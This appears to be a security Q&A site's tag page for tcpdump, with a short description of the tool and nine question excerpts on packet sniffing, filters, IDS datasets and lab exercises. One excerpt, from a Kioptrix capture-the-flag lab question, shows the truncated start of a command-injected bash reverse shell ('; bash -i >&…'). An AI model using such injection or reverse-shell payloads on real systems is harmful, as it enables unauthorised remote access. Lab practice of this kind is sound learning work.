Questions tagged [tcpdump]

Tcpdump prints out a description of the contents of packets on a network interface that match the boolean expression; the description is preceded by a time stamp, printed, by default, as hours, minutes, seconds, and fractions of a second since midnight.

tcpdump is a common packet analyzer that runs under the command line. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Distributed under the BSD license, tcpdump is free software.

Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, macOS, HP-UX, Android and AIX among others. In those systems, tcpdump uses the libpcap library to capture packets. The port of tcpdump for Windows is called WinDump; it uses WinPcap, the Windows port of libpcap.

Source: Wikipedia

9 questions
12 votes, 4 answers

Eavesdropping vs. sniffing

I'm taking a Coursera course, and they take pains when talking about network security to distinguish between eavesdropping and sniffing. According to their definitions, sniffing involves reading or monitoring whole packets, whereas eavesdropping…
fox
10 votes, 1 answer

Wireshark tcp filter: tcp[((tcp[12:1] & 0xf0) >> 2):4]

While reading this doc https://wiki.wireshark.org/CaptureFilters I found this line: tcp[((tcp[12:1] & 0xf0) >> 2):4] which figures out the TCP Header Length, but I can't find out how it really works (in detail). Can somebody explain it?
Neymour
1 vote, 2 answers

tcpdump packets have bad and incorrect checksums on localhost, how to investigate further?

I am investigating a macOS Catalina machine that is believed to be infected with malware. I have been viewing packets with tcpdump and noticed that, on connecting to any web address, there is a legit packet that gets sent to the DNS server... then... there…
1 vote, 0 answers

Capture Packets of other devices in network

I'm challenged to capture packets sent from a client to the gateway in a network. Is it even possible for me to see the packets between the client and the gateway?
1 vote, 1 answer

Public Availability of a good Dataset in PCAP (TCPDUMP) format for IDS/IPS testing

I am trying to pass good, reputable malicious traffic through an IPS. There are several sources on the internet to explore for datasets, like the oldest, I think, the DARPA set (not available in pcap format and not that efficient for modern-day use) or the NSL-KDD dataset…
aneela
0 votes, 0 answers

How to decrypt TLS 1.3 TCP packets in Wireshark

I generated the public and private key with openssl req -x509 -nodes -days 365 -newkey rsa:4096 -keyout server_key.pem -out cert.pem and I am using C sockets for the server and client with OpenSSL; everything works fine and I can capture the…
anon
0 votes, 0 answers

Creating half open or full open connection in presence of SYN cookie

Suppose an attacker knows that a target host uses SYN cookies. Can the attacker create half-open or fully open connections by simply sending an ACK packet to the target? Why or why not?
0 votes, 0 answers

tcpdump in Kali Linux VM does not capture scp

I'm learning how to develop tests for a hardened server my company is developing for a client. The test configuration will consist of the test target (the server we're developing) and an external test laptop, which I'll use to run some test scripts.…
0 votes, 0 answers

Kioptrix 2: Why doesn't a netcat reverse shell executed in the web browser via a command injection bug work?

I've completed the Kioptrix Level 2 challenge via SQL injection, command injection, a bash reverse shell, and local privilege escalation as part of my OSCP preparation. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ ; bash -i >&…
Wolf